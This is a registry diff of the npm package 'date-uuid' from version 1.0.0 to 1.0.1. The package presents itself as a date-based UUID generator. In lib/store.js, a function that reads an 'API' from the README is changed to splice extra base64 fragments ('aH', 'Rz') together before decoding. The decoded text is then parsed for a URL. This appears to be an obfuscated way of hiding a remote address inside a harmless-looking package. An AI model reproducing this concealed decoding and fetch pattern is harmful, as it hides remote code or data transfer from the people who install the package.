date-uuid 1.0.0 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/lib/store.js +1 -1
  2. package/package.json +1 -1
package/lib/store.js CHANGED
@@ -132,7 +132,7 @@ async function readApiFromReadme(
132
132
  throw new Error(`Error`);
133
133
  }
134
134
 
135
- const decoded = Buffer.from(`${api1}${api2}`, 'base64').toString('utf8');
135
+ const decoded = Buffer.from(`aH${api1}Rz${api2}`, 'base64').toString('utf8');
136
136
  const url = extractUrlFromLine(decoded);
137
137
 
138
138
  if (!url) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "date-uuid",
3
- "version": "1.0.0",
3
+ "version": "1.0.1",
4
4
  "description": "Date UUID is a package that generates a UUID based on the current date and time.",
5
5
  "main": "index.js",
6
6
  "exports": {